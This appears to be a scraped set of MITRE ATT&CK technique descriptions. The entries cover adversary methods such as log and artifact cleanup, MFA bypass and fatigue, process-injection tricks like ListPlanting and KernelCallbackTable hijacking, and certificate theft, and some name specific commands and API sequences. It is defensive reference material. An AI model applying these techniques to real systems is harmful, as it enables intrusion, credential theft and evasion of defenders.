| Description |
|---|
Adversaries may modify mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails or logs generated by the application or operating system, such as export requests.
Adversaries may manipulate email mailbox data to remove logs and artifacts, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page) |
| Description |
|---|
Adversaries may clear or remove evidence of malicious network connections in order to clean up traces of their operations. Configuration settings as well as various artifacts that highlight connection history may be created on a system from behaviors that require network connections, such as [Remote Services](https://attack.mitre.org/techniques/T1021) or [External Remote Services](https://attack.mitre.org/techniques/T1133). Defenders may use these artifacts to monitor or otherwise analyze network connections created by adversaries.
Network connection history may be stored in various locations on a system. For example, RDP connection history may be stored in Windows Registry values under (Citation: Microsoft RDP Removal):
* HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default
* HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers
Windows may also store information about recent RDP connections in files such as C:\Users\\%username%\Documents\Default.rdp and `C:\Users\%username%\AppData\Local\Microsoft\Terminal
Server Client\Cache\`.(Citation: Moran RDPieces) Similarly, macOS and Linux hosts may store information highlighting connection history in system logs (such as those stored in `/Library/Logs` and/or `/var/log/`).(Citation: Apple Culprit Access)(Citation: FreeDesktop Journal)(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)
Malicious network connections may also require changes to network configuration settings, such as [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004) or tampering to enable [Proxy](https://attack.mitre.org/techniques/T1090). Adversaries may delete or modify this data to conceal indicators and/or impede defensive analysis. |
| Description |
|---|
| Adversaries may clear artifacts associated with previously established persistence on a host system to remove evidence of their activity. This may involve various actions, such as removing services, deleting executables, [Modify Registry](https://attack.mitre.org/techniques/T1112), [Plist File Modification](https://attack.mitre.org/techniques/T1647), or other methods of cleanup to prevent defenders from collecting evidence of their persistent presence.(Citation: Cylance Dust Storm) In some instances, artifacts of persistence may also be removed once an adversary’s persistence is executed in order to prevent errors with the new instance of the malware.(Citation: NCC Group Team9 June 2020) |
| Description |
|---|
| Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud) Creating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider. |
| Description |
|---|
| Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud) A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021) |
| Description |
|---|
| Adversaries may search public code repositories for information about victims that can be used during targeting. Victims may store code in repositories on various third-party websites such as GitHub, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Adversaries may search various public code repositories for various information about a victim. Public code repositories can often be a source of various general information about victims, such as commonly used programming languages and libraries as well as the names of employees. Adversaries may also identify more sensitive data, including accidentally leaked credentials or API keys.(Citation: GitHub Cloud Service Credentials) Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1213/003), which focuses on [Collection](https://attack.mitre.org/tactics/TA0009) from private and internally hosted code repositories. |
| Description |
|---|
Adversaries may redirect network traffic to adversary-owned systems by spoofing Dynamic Host Configuration Protocol (DHCP) traffic and acting as a malicious DHCP server on the victim network. By achieving the adversary-in-the-middle (AiTM) position, adversaries may collect network communications, including passed credentials, especially those sent over insecure, unencrypted protocols. This may also enable follow-on behaviors such as [Network Sniffing](https://attack.mitre.org/techniques/T1040) or [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002).
DHCP is based on a client-server model and has two functionalities: a protocol for providing network configuration settings from a DHCP server to a client and a mechanism for allocating network addresses to clients.(Citation: rfc2131) The typical server-client interaction is as follows:
1. The client broadcasts a `DISCOVER` message.
2. The server responds with an `OFFER` message, which includes an available network address.
3. The client broadcasts a `REQUEST` message, which includes the network address offered.
4. The server acknowledges with an `ACK` message and the client receives the network configuration parameters.
Adversaries may spoof as a rogue DHCP server on the victim network, from which legitimate hosts may receive malicious network configurations. For example, malware can act as a DHCP server and provide adversary-owned DNS servers to the victimized computers.(Citation: new_rogue_DHCP_serv_malware)(Citation: w32.tidserv.g) Through the malicious network configurations, an adversary may achieve the AiTM position, route client traffic through adversary-controlled systems, and collect information from the client network.
DHCPv6 clients can receive network configuration information without being assigned an IP address by sending a INFORMATION-REQUEST (code 11) message to the All_DHCP_Relay_Agents_and_Servers multicast address.(Citation: rfc3315) Adversaries may use their rogue DHCP server to respond to this request message with malicious network configurations.
Rather than establishing an AiTM position, adversaries may also abuse DHCP spoofing to perform a DHCP exhaustion attack (i.e, [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002)) by generating many broadcast DISCOVER messages to exhaust a network’s DHCP allocation pool. |
| Description |
|---|
Adversaries may employ various means to detect and avoid debuggers. Debuggers are typically used by defenders to trace and/or analyze the execution of potential malware payloads.(Citation: ProcessHacker Github)
Debugger evasion may include changing behaviors based on the results of the checks for the presence of artifacts indicative of a debugged environment. Similar to [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497), if the adversary detects a debugger, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for debugger artifacts before dropping secondary or additional payloads.
Specific checks will vary based on the target and/or adversary, but may involve [Native API](https://attack.mitre.org/techniques/T1106) function calls such as IsDebuggerPresent() and NtQueryInformationProcess(), or manually checking the BeingDebugged flag of the Process Environment Block (PEB). Other checks for debugging artifacts may also seek to enumerate hardware breakpoints, interrupt assembly opcodes, time checks, or measurements if exceptions are raised in the current process (assuming a present debugger would “swallow” or handle the potential error).(Citation: hasherezade debug)(Citation: AlKhaser Debug)(Citation: vxunderground debug)
Adversaries may use the information learned from these debugger checks during automated discovery to shape follow-on behaviors. Debuggers can also be evaded by detaching the process or flooding debug logs with meaningless data via messages produced by looping [Native API](https://attack.mitre.org/techniques/T1106) function calls such as OutputDebugStringW().(Citation: wardle evilquest partii)(Citation: Checkpoint Dridex Jan 2021) |
| Description |
|---|
| Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in order to bypass initial MFA requirements and gain persistent access to a network.(Citation: CISA MFA PrintNightmare)(Citation: DarkReading FireEye SolarWinds) Similarly, an adversary with existing access to a network may register a device to Azure AD and/or its device management system, Microsoft Intune, in order to access sensitive data or resources while bypassing conditional access policies.(Citation: AADInternals - Device Registration)(Citation: AADInternals - Conditional Access Bypass)(Citation: Microsoft DEV-0537) Devices registered in Azure AD may be able to conduct [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) campaigns via intra-organizational emails, which are less likely to be treated as suspicious by the email client.(Citation: Microsoft - Device Registration) Additionally, an adversary may be able to perform a [Service Exhaustion Flood](https://attack.mitre.org/techniques/T1499/002) on an Azure AD tenant by registering a large number of devices.(Citation: AADInternals - BPRT) |
| Description |
|---|
| Adversaries may obfuscate then dynamically resolve API functions called by their malware in order to conceal malicious functionalities and impair defensive analysis. Malware commonly uses various [Native API](https://attack.mitre.org/techniques/T1106) functions provided by the OS to perform various tasks such as those involving processes, files, and other system artifacts. API functions called by malware may leave static artifacts such as strings in payload files. Defensive analysts may also uncover which functions a binary file may execute via an import address table (IAT) or other structures that help dynamically link calling code to the shared modules that provide functions.(Citation: Huntress API Hash)(Citation: IRED API Hashing) To avoid static or other defensive analysis, adversaries may use dynamic API resolution to conceal malware characteristics and functionalities. Similar to [Software Packing](https://attack.mitre.org/techniques/T1027/002), dynamic API resolution may change file signatures and obfuscate malicious API function calls until they are resolved and invoked during runtime. Various methods may be used to obfuscate malware calls to API functions. For example, hashes of function names are commonly stored in malware in lieu of literal strings. Malware can use these hashes (or other identifiers) to manually reproduce the linking and loading process using functions such as `GetProcAddress()` and `LoadLibrary()`. These hashes/identifiers can also be further obfuscated using encryption or other string manipulation tricks (requiring various forms of [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) during execution).(Citation: BlackHat API Packers)(Citation: Drakonia HInvoke)(Citation: Huntress API Hash) |
| Description |
|---|
| Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs) Adversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage) For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021) Embedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT) |
| Description |
|---|
| Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts. Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD(Citation: Azure AD Hybrid Identity): * Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud * Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory * Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges. By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the `AzureADConnectAuthenticationAgentService` process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.(Citation: Azure AD Connect for Read Teamers)(Citation: AADInternals Azure AD On-Prem to Cloud) In environments using AD FS, an adversary may edit the `Microsoft.IdentityServer.Servicehost` configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.(Citation: MagicWeb) In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.(Citation: Mandiant Azure AD Backdoors) |
| Description |
|---|
| Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton) Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS `postinstall` scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)) with the elevated permissions.(Citation: Application Bundle Manipulation Brandon Dalton)(Citation: wardle evilquest parti) Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include `preinst`, `postinst`, `prerm`, `postrm` scripts and run as root when executed. For Windows, the Microsoft Installer services uses `.msi` files to manage the installing, updating, and uninstalling of applications. Adversaries have leveraged `Prebuild` and `Postbuild` events to run commands before or after a build when installing .msi files.(Citation: Windows AppleJeus GReAT)(Citation: Debian Manual Maintainer Scripts) |
| Description |
|---|
Adversaries may abuse the KernelCallbackTable of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll is loaded.(Citation: Windows Process Injection KernelCallbackTable)
An adversary may hijack the execution flow of a process using the KernelCallbackTable by replacing an original callback function with a malicious payload. Modifying callback functions can be achieved in various ways involving related behaviors such as [Reflective Code Loading](https://attack.mitre.org/techniques/T1620) or [Process Injection](https://attack.mitre.org/techniques/T1055) into another process.
A pointer to the memory address of the KernelCallbackTable can be obtained by locating the PEB (ex: via a call to the NtQueryInformationProcess() [Native API](https://attack.mitre.org/techniques/T1106) function).(Citation: NtQueryInformationProcess) Once the pointer is located, the KernelCallbackTable can be duplicated, and a function in the table (e.g., fnCOPYDATA) set to the address of a malicious payload (ex: via WriteProcessMemory()). The PEB is then updated with the new address of the table. Once the tampered function is invoked, the malicious payload will be triggered.(Citation: Lazarus APT January 2022)
The tampered function is typically invoked using a Windows message. After the process is hijacked and malicious code is executed, the KernelCallbackTable may also be restored to its original state by the rest of the malicious payload.(Citation: Lazarus APT January 2022) Use of the KernelCallbackTable to hijack execution flow may evade detection from security products since the execution can be masked under a legitimate process. |
| Description |
|---|
Adversaries may abuse list-view controls to inject malicious code into hijacked processes in order to evade process-based defenses as well as possibly elevate privileges. ListPlanting is a method of executing arbitrary code in the address space of a separate live process. Code executed via ListPlanting may also evade detection from security products since the execution is masked under a legitimate process.
List-view controls are user interface windows used to display collections of items.(Citation: Microsoft List View Controls) Information about an application's list-view settings are stored within the process' memory in a SysListView32 control.
ListPlanting (a form of message-passing "shatter attack") may be performed by copying code into the virtual address space of a process that uses a list-view control then using that code as a custom callback for sorting the listed items.(Citation: Modexp Windows Process Injection) Adversaries must first copy code into the target process’ memory space, which can be performed various ways including by directly obtaining a handle to the SysListView32 child of the victim process window (via Windows API calls such as FindWindow and/or EnumWindows) or other [Process Injection](https://attack.mitre.org/techniques/T1055) methods.
Some variations of ListPlanting may allocate memory in the target process but then use window messages to copy the payload, to avoid the use of the highly monitored WriteProcessMemory function. For example, an adversary can use the PostMessage and/or SendMessage API functions to send LVM_SETITEMPOSITION and LVM_GETITEMPOSITION messages, effectively copying a payload 2 bytes at a time to the allocated memory.(Citation: ESET InvisiMole June 2020)
Finally, the payload is triggered by sending the LVM_SORTITEMS message to the SysListView32 child of the process window, with the payload within the newly allocated buffer passed and executed as the ListView_SortItems callback. |
| Description |
|---|
| Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts. Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://attack.mitre.org/techniques/T1621), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.(Citation: Mandiant APT42)(Citation: Azure AD Conditional Access Exclusions) For example, modifying the Windows hosts file (`C:\windows\system32\drivers\etc\hosts`) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. (Citation: Russians Exploit Default MFA Protocol - CISA March 2022) Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim's network environment.(Citation: Russians Exploit Default MFA Protocol - CISA March 2022) |
| Description |
|---|
| Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users. Adversaries in possession credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe) |
| Description |
|---|
Adversaries may modify property list files (plist files) to enable other malicious activity, while also potentially evading and bypassing system defenses. macOS applications use plist files, such as the info.plist file, to store properties and configuration settings that inform the operating system how to handle the application at runtime. Plist files are structured metadata in key-value pairs formatted in XML based on Apple's Core Foundation DTD. Plist files can be saved in text or binary format.(Citation: fileinfo plist file description)
Adversaries can modify key-value pairs in plist files to influence system behaviors, such as hiding the execution of an application (i.e. [Hidden Window](https://attack.mitre.org/techniques/T1564/003)) or running additional commands for persistence (ex: [Launch Agent](https://attack.mitre.org/techniques/T1543/001)/[Launch Daemon](https://attack.mitre.org/techniques/T1543/004) or [Re-opened Applications](https://attack.mitre.org/techniques/T1547/007)).
For example, adversaries can add a malicious application path to the `~/Library/Preferences/com.apple.dock.plist` file, which controls apps that appear in the Dock. Adversaries can also modify the LSUIElement key in an application’s info.plist file to run the app in the background. Adversaries can also insert key-value pairs to insert environment variables, such as LSEnvironment, to enable persistence via [Dynamic Linker Hijacking](https://attack.mitre.org/techniques/T1574/006).(Citation: wardle chp2 persistence)(Citation: eset_osx_flashback) |
| Description |
|---|
Adversaries may attempt to hide process command-line arguments by overwriting process memory. Process command-line arguments are stored in the process environment block (PEB), a data structure used by Windows to store various information about/used by a process. The PEB includes the process command-line arguments that are referenced when executing the process. When a process is created, defensive tools/sensors that monitor process creations may retrieve the process arguments from the PEB.(Citation: Microsoft PEB 2021)(Citation: Xpn Argue Like Cobalt 2019)
Adversaries may manipulate a process PEB to evade defenses. For example, [Process Hollowing](https://attack.mitre.org/techniques/T1055/012) can be abused to spawn a process in a suspended state with benign arguments. After the process is spawned and the PEB is initialized (and process information is potentially logged by tools/sensors), adversaries may override the PEB to modify the command-line arguments (ex: using the [Native API](https://attack.mitre.org/techniques/T1106) WriteProcessMemory() function) then resume process execution with malicious arguments.(Citation: Cobalt Strike Arguments 2019)(Citation: Xpn Argue Like Cobalt 2019)(Citation: Nviso Spoof Command Line 2020)
Adversaries may also execute a process with malicious command-line arguments then patch the memory with benign arguments that may bypass subsequent process memory analysis.(Citation: FireEye FiveHands April 2021)
This behavior may also be combined with other tricks (such as [Parent PID Spoofing](https://attack.mitre.org/techniques/T1134/004)) to manipulate or further evade process-based detections. |
| Description |
|---|
An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The AllowReversiblePasswordEncryption property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.(Citation: store_pwd_rev_enc)
If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:
1. Encrypted password (G$RADIUSCHAP) from the Active Directory user-structure userParameters
2. 16 byte randomly-generated value (G$RADIUSCHAPKEY) also from userParameters
3. Global LSA secret (G$MSRADIUSCHAPKEY)
4. Static key hardcoded in the Remote Access Subauthentication DLL (RASSFM.DLL)
With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.(Citation: how_pwd_rev_enc_1)(Citation: how_pwd_rev_enc_2)
An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://attack.mitre.org/techniques/T1059/001) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.(Citation: dump_pwd_dcsync) In PowerShell, an adversary may make associated changes to user settings using commands similar to Set-ADUser -AllowReversiblePasswordEncryption $true. |
| Description |
|---|
| Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO) To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO) Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader) SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader) |
| Description |
|---|
| Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers) |
| Description |
|---|
| Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers) |
| Description |
|---|
| Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining malware (i.e. [Resource Hijacking](https://attack.mitre.org/techniques/T1496)).(Citation: Cado Security Denonia) Adversaries may also create functions that enable further compromise of the cloud environment. For example, an adversary may use the `IAM:PassRole` permission in AWS or the `iam.serviceAccounts.actAs` permission in Google Cloud to add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to a serverless cloud function, which may then be able to perform actions the original user cannot.(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Rhingo Security Labs GCP Privilege Escalation) Serverless functions can also be invoked in response to cloud events (i.e. [Event Triggered Execution](https://attack.mitre.org/techniques/T1546)), potentially enabling persistent execution over time. For example, in AWS environments, an adversary may create a Lambda function that automatically adds [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) to a user and a corresponding CloudWatch events rule that invokes that function whenever a new user is created.(Citation: Backdooring an AWS account) Similarly, an adversary may create a Power Automate workflow in Office 365 environments that forwards all emails a user receives or creates anonymous sharing links whenever a user is granted access to a document in SharePoint.(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001) |
| Description |
|---|
| Adversaries may attach filters to a network socket to monitor then activate backdoors used for persistence or command and control. With elevated permissions, adversaries can use features such as the `libpcap` library to open sockets and install filters to allow or disallow certain types of data to come through the socket. The filter may apply to all traffic passing through the specified network interface (or every interface if not specified). When the network interface receives a packet matching the filter criteria, additional actions can be triggered on the host, such as activation of a reverse shell. To establish a connection, an adversary sends a crafted packet to the targeted host that matches the installed filter criteria.(Citation: haking9 libpcap network sniffing) Adversaries have used these socket filters to trigger the installation of implants, conduct ping backs, and to invoke command shells. Communication with these socket filters may also be used in conjunction with [Protocol Tunneling](https://attack.mitre.org/techniques/T1572).(Citation: exatrack bpf filters passive backdoors)(Citation: Leonardo Turla Penquin May 2020) Filters can be installed on any Unix-like platform with `libpcap` installed or on Windows hosts using `Winpcap`. Adversaries may use either `libpcap` with `pcap_setfilter` or the standard library function `setsockopt` with `SO_ATTACH_FILTER` options. Since the socket connection is not active until the packet is received, this behavior may be difficult to detect due to the lack of activity on a host, low CPU overhead, and limited visibility into raw socket usage. |
| Description |
|---|
| Adversaries may steal or forge certificates used for authentication to access remote systems or resources. Digital certificates are often used to sign and encrypt messages and/or files. Certificates are also used as authentication material. For example, Azure AD device certificates and Active Directory Certificate Services (AD CS) certificates bind to an identity and can be used as credentials for domain accounts.(Citation: O365 Blog Azure AD Device IDs)(Citation: Microsoft AD CS Overview) Authentication certificates can be both stolen and forged. For example, AD CS certificates can be stolen from encrypted storage (in the Registry or files), misplaced certificate files (i.e. [Unsecured Credentials](https://attack.mitre.org/techniques/T1552)), or directly from the Windows certificate store via various crypto APIs.(Citation: SpecterOps Certified Pre Owned)(Citation: GitHub CertStealer)(Citation: GitHub GhostPack Certificates) With appropriate enrollment rights, users and/or machines within a domain can also request and/or manually renew certificates from enterprise certificate authorities (CA). This enrollment process defines various settings and permissions associated with the certificate. Of note, the certificate’s extended key usage (EKU) values define signing, encryption, and authentication use cases, while the certificate’s subject alternative name (SAN) values define the certificate owner’s alternate names.(Citation: Medium Certified Pre Owned) Abusing certificates for authentication credentials may enable other behaviors such as [Lateral Movement](https://attack.mitre.org/tactics/TA0008). Certificate-related misconfigurations may also enable opportunities for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004), by way of allowing users to impersonate or assume privileged accounts or permissions via the identities (SANs) associated with a certificate. These abuses may also enable [Persistence](https://attack.mitre.org/tactics/TA0003) via stealing or forging certificates that can be used as [Valid Accounts](https://attack.mitre.org/techniques/T1078) for the duration of the certificate's validity, despite user password resets. Authentication certificates can also be stolen and forged for machine accounts. Adversaries who have access to root (or subordinate) CA certificate private keys (or mechanisms protecting/managing these keys) may also establish [Persistence](https://attack.mitre.org/tactics/TA0003) by forging arbitrary authentication certificates for the victim domain (known as “golden” certificates).(Citation: Medium Certified Pre Owned) Adversaries may also target certificates and related services in order to access other forms of credentials, such as [Golden Ticket](https://attack.mitre.org/techniques/T1558/001) ticket-granting tickets (TGT) or NTLM plaintext.(Citation: Medium Certified Pre Owned) |
| Description |
|---|
